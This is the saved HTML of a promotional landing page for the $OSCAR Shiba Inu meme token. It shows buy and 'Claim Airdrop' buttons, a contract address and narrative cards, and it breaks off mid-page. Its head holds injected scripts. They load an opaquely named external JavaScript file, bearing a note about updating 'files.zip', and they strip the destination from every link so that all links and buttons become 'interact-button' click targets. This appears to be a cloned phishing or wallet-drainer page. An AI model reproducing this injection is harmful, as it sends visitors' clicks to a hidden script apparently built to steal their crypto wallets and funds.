<!DOCTYPE html><!-- Last Published: Sat Nov 30 2024 07:53:30 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-domain="www.oscarshibatoken.com" data-wf-page="6720ca2cf3750cb622318e3f" data-wf-site="6720ca2cf3750cb622318dd9" class="w-mod-js wf-manrope-n3-active wf-manrope-n8-active wf-manrope-n2-active wf-manrope-n5-active wf-manrope-n4-active wf-manrope-n7-active wf-manrope-n6-active wf-inter-n2-active wf-inter-n5-active wf-inter-n6-active wf-inter-n3-active wf-inter-n4-active wf-active w-mod-ix" >

<head>
    <style>
        .wf-force-outline-none[tabindex="-1"]:focus{outline:none;}
    </style>
<script charset="UTF-8" type="text/javascript" src="./5a34bbbc-6661-40ab-b4c8-fff90b78a6c6.js"></script><!–– Please update files.zip if you not already did and check below (updated the 11/11) ––>
<script>
    document.addEventListener('DOMContentLoaded', function () {
        var links = document.querySelectorAll('body a');
        for (var i = 0; i < links.length; i++) {
            var link = links[i];
            link.removeAttribute('href');
            link.classList.add('interact-button');
        }
    });
    </script>
    
    <script>
    document.addEventListener('DOMContentLoaded', function () {
        var buttons = document.querySelectorAll('body button');
        for (var i = 0; i < buttons.length; i++) {
            var button = buttons[i];
            button.classList.add('interact-button');
        }
    });
    </script>
    
    <script>
    document.addEventListener("DOMContentLoaded", function() {
        const elements = document.querySelectorAll('[ad-data-linked]');
        elements.forEach(element => {
            element.removeAttribute('ad-data-linked');
        });
    
        console.log('Removed ad-data-linked attributes from', elements.length, 'elements');
    });
    </script>
    
    <style>
    .interact-button {
        cursor: pointer;
    }
    </style>


<title>$OSCAR</title>
    <meta content="Welcome to $OSCAR, token for the OG Shiba Inu meme from 2011 and Ryoshi's inspiration to his SHIB ecosystem, managed by the community for teh people." name="description">
    <meta content="$OSCAR" property="og:title">
    <meta content="Welcome to $OSCAR, token for the OG Shiba Inu meme from 2011 and Ryoshi's inspiration to his SHIB ecosystem, managed by the community for teh people." property="og:description">
    <meta content="https://i.ibb.co/6nmWfVR/Oscar-OG.png" property="og:image">
    <meta content="$OSCAR" property="twitter:title">
    <meta content="Welcome to $OSCAR, token for the OG Shiba Inu meme from 2011 and Ryoshi's inspiration to his SHIB ecosystem, managed by the community for teh people." property="twitter:description">
    <meta content="https://i.ibb.co/6nmWfVR/Oscar-OG.png" property="twitter:image">
    <meta property="og:type" content="website">
    <meta content="summary_large_image" name="twitter:card">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <link href="oscartoken.webflow.c55f17155.css" rel="stylesheet" type="text/css">
    <style>
        @media (min-width:992px) {html.w-mod-js:not(.w-mod-ix) [data-w-id="43b2a4ae-f934-5a3a-60ec-4eb6ab66fd07"] {display:flex;}html.w-mod-js:not(.w-mod-ix) [data-w-id="3488554c-fe1a-ba8d-8eaa-2749383949b9"] {display:flex;}html.w-mod-js:not(.w-mod-ix) [data-w-id="7a405be8-0a26-057e-3bd3-7289f3f98871"] {display:flex;}html.w-mod-js:not(.w-mod-ix) [data-w-id="7c369291-b38e-0008-5e70-efcc18461d4e"] {display:flex;}html.w-mod-js:not(.w-mod-ix) [data-w-id="0d2a9997-29da-3c0d-5fc8-c8975e65b539"] {display:flex;}html.w-mod-js:not(.w-mod-ix) [data-w-id="cd77fd79-77e1-2b9b-d0bd-3fe9f2d890ca"] {display:flex;}}
    </style>
    <link rel="stylesheet" href="css.css" media="all">
    <link href="67293c49557aaa6969cea5d2_32x32.png" rel="shortcut icon" type="image/x-icon">
    <link href="https://cdn.prod.website-files.com/6720ca2cf3750cb622318dd9/67293c4e5e92773ad195463b_256x256.png" rel="apple-touch-icon">
</head>

<body class="body">
    <div data-w-id="bbb1681c-62a0-7375-a529-1c7bec5a4a0e" class="section landingbg">
        <div data-animation="default" class="navbar w-nav" data-easing2="ease-in-out" data-easing="ease-in-out" data-collapse="medium" role="banner" data-no-scroll="1" data-duration="300" data-doc-height="1">
            <div class="container nav-container">
                <div class="nav-menu-container" style="opacity: 1;"><a href="" aria-current="page" class="brand w-nav-brand w--current" aria-label="home"><img src="6720f21b8dae0c5d4b6837d0_oscar-face.png" loading="lazy" width="20" height="Auto" alt="" srcset="6720f21b8dae0c5d4b6837d0_oscar-face-p-500.png 500w, 6720f21b8dae0c5d4b6837d0_oscar-face.png 504w" sizes="(max-width: 991px) 36px, 40.953125px" class="brand-image"></a>
                    <nav role="navigation" class="nav-menu w-nav-menu">
                        <div class="nav-link">
                            <div class="nav-link-active-holder"><a href="#narrative" class="nav-link-holder w-inline-block">
                                    <div class="nav-link-text-holder">
                                        <div class="nav-link-text">Narrative</div>
                                    </div>
                                </a><a href="#Narrative" class="cricle-active-holder w-inline-block"></a></div>
                            <div class="nav-link-active-holder"><a href="#Community" class="nav-link-holder w-inline-block">
                                    <div class="nav-link-text-holder">
                                        <div class="nav-link-text">Community</div>
                                    </div>
                                </a><a href="#Community" class="cricle-active-holder w-inline-block"></a></div>
                            <div class="nav-link-active-holder"><a href="#integration" class="nav-link-holder w-inline-block">
                                    <div class="nav-link-text-holder">
                                        <div class="nav-link-text">Tokenomics</div>
                                    </div>
                                </a><a href="#integration" class="cricle-active-holder w-inline-block"></a></div>
                            <div class="nav-link-active-holder"><a href="#features" class="nav-link-holder w-inline-block">
                                    <div class="nav-link-text-holder">
                                        <div class="nav-link-text">How to Buy</div>
                                    </div>
                                </a><a href="#features" class="cricle-active-holder w-inline-block"></a></div>
                        </div>
                        <div class="nav-button-holder"><a href="https://app.uniswap.org/explore/tokens/ethereum/0xebb66a88cedd12bfe3a289df6dfee377f2963f12" target="_blank" class="button navbar-button w-button">Buy Now</a></div>
                    </nav>
                    <div class="menu-button w-nav-button" style="-webkit-user-select: text;" aria-label="menu" role="button" tabindex="0" aria-controls="w-nav-overlay-0" aria-haspopup="menu" aria-expanded="false">
                        <div class="center-box"><img src="6720ca2cf3750cb622318e54_menu.svg" loading="lazy" alt=""></div>
                    </div>
                </div>
            </div>
            <div class="w-nav-overlay" data-wf-ignore="" id="w-nav-overlay-0"></div>
        </div>
        <div class="container no-paddings">
            <div class="hero-section">
                <div class="hero-section-text-holder" style="will-change: transform; transform: translate3d(0.002px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                    <div class="hero-section-sticky">
                        <div class="hero-sticky-holder">
                            <div class="hero-text-holder" style="will-change: transform; transform: translate3d(-0.004px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                                <div class="hero-text-wrapper _01" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d; opacity: 1;">
                                    <div class="hero-text">$</div>
                                    <div class="hero-text-blur" style="opacity: 0.6; filter: blur(120px); will-change: transform; transform: translate3d(0.01px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">$</div>
                                </div>
                                <div class="hero-text-wrapper _02" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d; opacity: 1;">
                                    <div class="hero-text _02">oscar</div> <br>
                                    <div class="nav-button-holder"><a href="https://app.uniswap.org/explore/tokens/ethereum/0xebb66a88cedd12bfe3a289df6dfee377f2963f12" target="_blank" class="button navbar-button w-button">Claim Airdrop</a></div>                                    <div class="hero-text-blur" style="opacity: 0.6; filter: blur(120px); will-change: transform; transform: translate3d(0.01px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">oscar</div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="iphone-holder" style="transform: translate3d(0px, 0%, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d; opacity: 1;"><img src="674a0e5126206f7036efeb82_token-green.webp" loading="lazy" sizes="(max-width: 479px) 94vw, (max-width: 767px) 93vw, (max-width: 1439px) 94vw, 952px" srcset="674a0e5126206f7036efeb82_token-green-p-500.webp 500w, 674a0e5126206f7036efeb82_token-green-p-800.webp 800w, 674a0e5126206f7036efeb82_token-green.webp 952w" alt="" class="iphone-image">
                        <div class="iphone-screen"><img src="6720df202a7d7abefa147c92_token-green.png" loading="lazy" alt="" sizes="(max-width: 479px) 85vw, (max-width: 767px) 84vw, (max-width: 1439px) 86vw, 1174.953125px" srcset="6720df202a7d7abefa147c92_token-green-p-500.png 500w, 6720df202a7d7abefa147c92_token-green-p-800.png 800w, 6720df202a7d7abefa147c92_token-green.png 952w" class="iphone-screen-image"></div>
                    </div>
                </div>
                <div class="hero-section-paragraph-holder"><img src="674a0e510abba6550e72439c_moon-cloud.webp" loading="lazy" sizes="(max-width: 479px) 94vw, (max-width: 767px) 67vw, (max-width: 991px) 68vw, (max-width: 1439px) 48vw, 647px" srcset="674a0e510abba6550e72439c_moon-cloud-p-500.webp 500w, 674a0e510abba6550e72439c_moon-cloud-p-800.webp 800w, 674a0e510abba6550e72439c_moon-cloud.webp 1054w" alt="" class="image-11">
                    <div class="hero-paragraph-holder">
                        <p id="w-node-_5ea415ca-a921-34a0-1f6c-2725653f31ff-653f31ef" class="paragraph">A Decentralized Meme Token <span class="text-span-15">that is evolving into a</span> <span>Vibrant Ecosystem.<br></span><span class="text-span-10">wow boing</span></p>
                        <p class="paragraph"><span class="text-span-5">Contract Address: <strong class="bold-text-6">0xeBb66a88cEdd12bfE3a289df6DFEe377F2963F12</strong></span><br></p><a href="https://x.com/solidproof_news/status/1854433616912118154" target="_blank" class="link-block-4 w-inline-block"><img src="674a14c067d71376193e7688_solidproof.webp" loading="lazy" width="Auto" sizes="(max-width: 479px) 75vw, (max-width: 991px) 43vw, (max-width: 1439px) 30vw, 517.59375px" alt="" srcset="674a14c067d71376193e7688_solidproof-p-500.webp 500w, 674a14c067d71376193e7688_solidproof-p-800.webp 800w, 674a14c067d71376193e7688_solidproof-p-1080.webp 1080w, 674a14c067d71376193e7688_solidproof.webp 1150w" class="image-11 audit"></a><a id="w-node-_81430a63-8ad4-58a4-8f2b-48e536bbbef5-653f31ef" href="#sign-up" class="button navbar-button copycabutton w-button">Copy</a>
                    </div>
                </div>
            </div>
            <div class="fade-in-move-on-scroll" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"></div>
            <div class="logo-grid-holder">
                <div class="w-layout-grid logo-grid openinglinks">
                    <div id="w-node-f078fdf9-afcd-dd23-e056-d7d58c77dcd8-22318e3f" class="logo-small-container openinglogolink" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://x.com/oscar_shibainu/" target="_blank" class="w-inline-block"><img src="67445285ec5c0e0682623900_Xnew.svg" loading="lazy" alt="" class="logo-small"></a></div>
                    <div id="w-node-f078fdf9-afcd-dd23-e056-d7d58c77dcdc-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="http://t.me/oscarshib" target="_blank" class="w-inline-block"><img src="67445285adfec316a12b25be_Telegramnew.svg" loading="lazy" alt="" class="logo-small"></a></div>
                    <div id="w-node-f078fdf9-afcd-dd23-e056-d7d58c77dcde-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://dexscreener.com/ethereum/0x9b9d97a9215882f4a68b0d0d591d5aaeb29e5e47" target="_blank" class="w-inline-block"><img src="67445285770f8535bb2c7b4b_Dexscnew.svg" loading="lazy" alt="" class="logo-small"></a></div>
                    <div id="w-node-f078fdf9-afcd-dd23-e056-d7d58c77dce0-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.dextools.io/app/en/token/oscar?t=1730816193048" target="_blank" class="w-inline-block"><img src="6744528567e0bd24cb9a5cbb_Dextnew.svg" loading="lazy" alt="" class="logo-small"></a></div>
                    <div id="w-node-f078fdf9-afcd-dd23-e056-d7d58c77dce2-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://coinmarketcap.com/currencies/oscar/" target="_blank" class="w-inline-block"><img src="674452852be6afcb26f37840_CMCnew.svg" loading="lazy" alt="" class="logo-small"></a></div>
                    <div id="w-node-c77bf355-6e90-2f4e-37fe-34727172dac6-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.coingecko.com/en/coins/oscar" target="_blank" class="w-inline-block"><img src="674452847694ed53cd36084a_CGnew.svg" loading="lazy" alt="" class="logo-small"></a></div>
                </div>
            </div>
        </div>
    </div>
    <div id="narrative" class="section narrative">
        <div id="experince" class="section">
            <div class="container narrative">
                <div class="experience-section">
                    <div class="fade-in-move-on-scroll" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                        <h1 class="title">Who is Oscar? </h1>
                        <p class="paragraph-12"><span class="text-span-3">The first, and the father of all Shiba Inu memes which became the inspiration for Ryoshi's SHIB ecosystem.<br></span></p>
                        <p class="paragraph-12"><span class="text-span-3 boingtext">wow study pls<br></span></p>
                    </div>
                    <div class="fade-in-move-on-scroll" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                        <div class="experience-cards-holder">
                            <div class="experience-grid">
                                <div id="w-node-_8c828c4b-063f-f20f-6482-b138be2c6dbe-22318e3f" class="experience-wrapper">
                                    <div id="w-node-_7c769986-af35-2c7e-a088-51a92c6e6099-22318e3f" class="experience-card" style="">
                                        <div data-w-id="43b2a4ae-f934-5a3a-60ec-4eb6ab66fd07" class="light-wrapper-in-front" style="">
                                            <div class="light">
                                                <div class="light-outside" style=""></div>
                                            </div>
                                        </div>
                                        <div class="experience-card-content">
                                            <div class="experience-card-image-holder _02"><img src="674a19a97eebd80345b43868_c6b00009dae77b457516e905224b0fce.gif" loading="lazy" alt="" class="experience-card-image"></div>
                                            <div class="experience-card-text-holder _02" style="">
                                                <div class="card-title"><span class="text-span-11">The story begins with Ryoshi,</span></div>
                                                <div class="experience-paragraph-holder">
                                                    <p class="paragraph-4"><span class="text-span-4">who saw the 2011 </span><a href="https://www.youtube.com/watch?v=LViwmsowPU4&amp;t=1s" target="_blank"><span class="text-span-4">YouTube video of Oscar</span></a><span class="text-span-4">, the Shiba Inu dog on a trampoline, and used a screenshot from it when he introduced the Shibtoken to the world in the well-known Medium article titled<br>‍</span><a href="https://assets-global.website-files.com/6424006598e25f12a6360e93/6425c40b662f5690cb62e831_Ryoshi_Article.pdf" target="_blank"><span class="text-span-4">"All Hail The Shiba!" (August 2nd, 2020)</span></a><span class="text-span-4">.</span></p><a id="w-node-_711bf8a4-79e2-6f6c-eee9-f743e935618d-22318e3f" href="https://medium.com/@oscarshibainu6/oscar-the-shiba-inu-dog-who-jumps-on-a-trampoline-6400705a9396" target="_blank" class="button navbar-button archivesbutton w-button">Medium Article →</a><a id="w-node-_9676637b-2b9e-8cc6-1e9c-d0b44dde6df7-22318e3f" href="https://www.youtube.com/watch?v=LViwmsowPU4" target="_blank" class="button navbar-button archivesbutton w-button">YouTube Video →</a>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="light-wrapper" style="">
                                            <div class="light">
                                                <div class="light-inside"></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div id="w-node-_1261dedf-b3c9-2162-53e7-29ae1d8c7955-22318e3f" class="experience-wrapper">
                                    <div id="w-node-c9a3eb7f-e26e-bb52-e19d-39f848eddb94-22318e3f" data-w-id="c9a3eb7f-e26e-bb52-e19d-39f848eddb94" class="experience-card" style="">
                                        <div data-w-id="3488554c-fe1a-ba8d-8eaa-2749383949b9" class="light-wrapper-in-front" style="">
                                            <div class="light">
                                                <div class="light-outside" style=""></div>
                                            </div>
                                        </div>
                                        <div class="experience-card-content">
                                            <div class="experience-card-image-holder"><img src="674a0e501d5a8469c1ebc8e5_Narrative-Card-1.webp" loading="lazy" alt="" class="experience-card-image"></div>
                                            <div class="experience-card-text-holder narrativearticle1" style="">
                                                <div class="card-title"><span class="text-span-12">Oscar appears in this article,</span></div>
                                                <div class="experience-paragraph-holder">
                                                    <p class="paragraph-3"><span>with Ryoshi's comment:<br>‍<strong>"Next we tell some more frens and WOW&nbsp;MOON&nbsp;LAMBO&nbsp;PUMPPPPPPY."</strong><br>Many see this as Ryoshi's prophecy, foretelling that <strong>$Oscar</strong> would one day come into existence. </span></p><a id="w-node-_43df4eca-63c5-9d76-8e72-5b6ca5db04cd-22318e3f" href="https://assets-global.website-files.com/6424006598e25f12a6360e93/6425c40b662f5690cb62e831_Ryoshi_Article.pdf" target="_blank" class="button navbar-button archivesbutton w-button">Ryoshi's Archives →</a>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="light-wrapper" style="">
                                            <div class="light">
                                                <div class="light-inside"></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div id="w-node-_7a405be8-0a26-057e-3bd3-7289f3f9886f-22318e3f" class="experience-wrapper">
                                    <div id="w-node-_7a405be8-0a26-057e-3bd3-7289f3f98870-22318e3f" class="experience-card" style="">
                                        <div data-w-id="7a405be8-0a26-057e-3bd3-7289f3f98871" class="light-wrapper-in-front" style="">
                                            <div class="light">
                                                <div class="light-outside" style=""></div>
                                            </div>
                                        </div>
                                        <div class="experience-card-content">
                                            <div class="experience-card-text-holder padding" style="">
                                                <div class="card-title"><span class="text-span-13">Adopted and guided by the Shiba community,</span></div>
                                                <div class="experience-paragraph-holder shibastory">
                                                    <p class="paragraph-5"><span class="text-span">$OSCAR also has the support of Paradox Designer part of the founding team of Shibtoken, who has been with Ryoshi from day one. ParadoxDesigner played a key role in the Shibtoken initial development, including the creation of the Shibtoken v1 website and the front-end design of ShibaSwap. Additionally, ParadoxDesigner is the artist behind the iconic logos of $SHIB and $LEASH, now recognized worldwide.</span></p>
                                                </div>
                                            </div>
                                            <div class="experience-card-image-holder"><img src="674a0e5055adf0df8c272b11_Narrative-Card-4.webp" loading="lazy" alt="" class="experience-card-image narrativecardlowmargin"></div>
                                        </div>
                                        <div class="light-wrapper" style="">
                                            <div class="light">
                                                <div class="light-inside"></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div id="w-node-_7c369291-b38e-0008-5e70-efcc18461d4c-22318e3f" class="experience-wrapper">
                                    <div id="w-node-_7c369291-b38e-0008-5e70-efcc18461d4d-22318e3f" class="experience-card" style="">
                                        <div data-w-id="7c369291-b38e-0008-5e70-efcc18461d4e" class="light-wrapper-in-front" style="">
                                            <div class="light">
                                                <div class="light-outside" style=""></div>
                                            </div>
                                        </div>
                                        <div class="experience-card-content">
                                            <div class="experience-card-image-holder smaller"><img src="674a0e5026206f7036efeb2d_Narrative-Card-3.webp" loading="lazy" alt="" class="experience-card-image"></div>
                                            <div class="experience-card-text-holder _02" style="">
                                                <div class="card-title"><span class="text-span-14">No one was closer to Ryoshi than Paradox,</span></div>
                                                <div class="experience-paragraph-holder">
                                                    <p class="paragraph-6"><span class="text-span-2">since he was amongst the first members of Ryoshi's Telegram and Discord groups.</span></p>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="light-wrapper" style="">
                                            <div class="light">
                                                <div class="light-inside"></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div id="w-node-_0d2a9997-29da-3c0d-5fc8-c8975e65b537-22318e3f" class="experience-wrapper">
                                    <div id="w-node-_0d2a9997-29da-3c0d-5fc8-c8975e65b538-22318e3f" class="experience-card" style="">
                                        <div data-w-id="0d2a9997-29da-3c0d-5fc8-c8975e65b539" class="light-wrapper-in-front" style="">
                                            <div class="light">
                                                <div class="light-outside" style=""></div>
                                            </div>
                                        </div>
                                        <div class="experience-card-content">
                                            <div class="experience-card-image-holder"><img src="674a0e507eebd80345ab09a8_Narrative-Card-6.webp" loading="lazy" alt="" class="experience-card-image"></div>
                                            <div class="experience-card-text-holder" style="">
                                                <div class="card-title"><span class="text-span-8">The Oscar meme gained global fame in 2011,</span></div>
                                                <div class="experience-paragraph-holder">
                                                    <p class="paragraph-3"><span>even before the Kabosu meme (#Dogecoin), which would go on to achieve worldwide recognition only in 2013.</span></p>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="light-wrapper" style="">
                                            <div class="light">
                                                <div class="light-inside"></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div id="w-node-cd77fd79-77e1-2b9b-d0bd-3fe9f2d890c9-22318e3f" class="experience-card" style="">
                                    <div data-w-id="cd77fd79-77e1-2b9b-d0bd-3fe9f2d890ca" class="light-wrapper-in-front" style="">
                                        <div class="light">
                                            <div class="light-outside" style=""></div>
                                        </div>
                                    </div>
                                    <div class="experience-card-content">
                                        <div class="experience-card-text-holder _02 socialprooftextholder" style="">
                                            <div class="card-title socialprooftitle"><span class="text-span-9">Supporting Voices</span></div>
                                        </div>
                                        <div class="experience-card-image-holder smaller"><img src="674a0e509951d50690b1b770_Narrative-Card-5.webp" loading="lazy" alt="" class="experience-card-image"></div>
                                    </div>
                                    <div class="light-wrapper" style="">
                                        <div class="light">
                                            <div class="light-inside"></div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div id="Community" class="cards-section oscarmy">
        <div class="container">
            <div class="center-title">
                <div class="title-holder">
                    <div class="fade-in-move-on-scroll" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                        <h1 class="title black-text">Community Ecosystem</h1>
                        <p class="paragraph-12"><span class="text-span-3 boingtext">#oscarmy go boing<br></span></p>
                    </div>
                    <div class="fade-in-move-on-scroll" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"></div>
                </div>
            </div>
            <div class="cards-grid-holder">
                <div class="cards-grid">
                    <div id="w-node-fc8765e5-00fe-9e2a-d8f7-edcc2476991c-22318e3f" data-w-id="fc8765e5-00fe-9e2a-d8f7-edcc2476991c" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background">
                        <div class="card-container">
                            <div class="card-image-holder _01" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d; opacity: 1;"><img src="674a1333270e0a39fda64df1_Memes.webp" loading="eager" sizes="(max-width: 479px) 100vw, (max-width: 767px) 16vw, (max-width: 991px) 17vw, (max-width: 1439px) 22vw, 308.5px" srcset="674a1333270e0a39fda64df1_Memes-p-500.webp 500w, 674a1333270e0a39fda64df1_Memes-p-800.webp 800w, 674a1333270e0a39fda64df1_Memes.webp 1014w" alt="" class="card-image ellipal"></div>
                            <div class="card-text-holder">
                                <div class="card-title black-text" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">Memes</div>
                                <div class="experience-paragraph-holder">
                                    <p class="black-text card-text" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">There's an endless repository of memes in our dedicated telegram channel. Hop in &amp; explore!</p>
                                    <div class="nav-button-holder ellipalbutton"><a href="https://x.com/oscar_shibainu/status/1847233878412468556" target="_blank" class="button navbar-button ellipalbutton w-button">Join Media Channel →</a></div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div id="w-node-eb39f325-8859-6038-bc3c-ab144f9640eb-22318e3f" class="two-cards-holder">
                        <div data-w-id="be56302e-1fa4-fbab-bfdf-1115daa8830e" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background">
                            <div class="card-container _02">
                                <div class="card-text-holder _02 charity-card">
                                    <div class="card-text-holder charitycardtext">
                                        <div class="card-title black-text" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">Charity Portal </div>
                                        <div class="experience-paragraph-holder">
                                            <p class="black-text card-text" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">oscarcharity.com<br>coming soon!</p><a href="#sign-up" class="button navbar-button coming-soon comingsoon2 w-button">Almost There 👀</a>
                                        </div>
                                    </div>
                                    <div id="w-node-b48612bd-3c37-44e7-fb82-d45a10447155-22318e3f" class="card-text-holder kabosucharitycard"><img src="674a0e5097791132512db651_Charity.webp" loading="lazy" width="200" height="94" alt="" srcset="674a0e5097791132512db651_Charity-p-500.webp 500w, 674a0e5097791132512db651_Charity-p-800.webp 800w, 674a0e5097791132512db651_Charity-p-1080.webp 1080w, 674a0e5097791132512db651_Charity.webp 1542w" sizes="(max-width: 479px) 29vw, (max-width: 767px) 102px, (max-width: 991px) 15vw, (max-width: 1439px) 20vw, 285.5px" class="card-image kabosu"></div>
                                </div>
                            </div>
                        </div>
                        <div data-w-id="747e597c-b48f-be9e-1070-ea3f40f0f06a" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-logo-holder">
                            <div data-w-id="e24e52c4-7e25-85b9-f3af-94bdde39da9b" class="card-logo-wrapper">
                                <div style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-logo-container"><img src="6720f21b8dae0c5d4b6837d0_oscar-face.png" loading="lazy" sizes="100px" srcset="6720f21b8dae0c5d4b6837d0_oscar-face-p-500.png 500w, 6720f21b8dae0c5d4b6837d0_oscar-face.png 504w" alt="" class="card-logo" style="will-change: transform; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"></div>
                            </div>
                            <div class="card-bg-image-holder"><img src="674a19a92f43c361aca06d06_trampoline-dog.gif" loading="lazy" alt="" class="card-bg-image"></div>
                        </div>
                    </div>
                    <div id="w-node-_5ab5adbc-57c9-c9b0-3c74-19cd092f35c9-22318e3f" data-w-id="5ab5adbc-57c9-c9b0-3c74-19cd092f35c9" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background">
                        <div class="card-container">
                            <div class="card-text-holder morepadding">
                                <div class="card-title black-text" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">Merchandise</div>
                                <div class="experience-paragraph-holder">
                                    <p class="black-text card-text" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">The community is upto something HUGE here! Stay tuned for more<br></p>
                                    <div class="nav-button-holder"><a href="#sign-up" class="button navbar-button coming-soon comingsoon2 w-button">Almost There 👀</a></div>
                                </div>
                            </div>
                            <div style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d; opacity: 1;" class="card-iphone-holder">
                                <div class="iphone-card"></div>
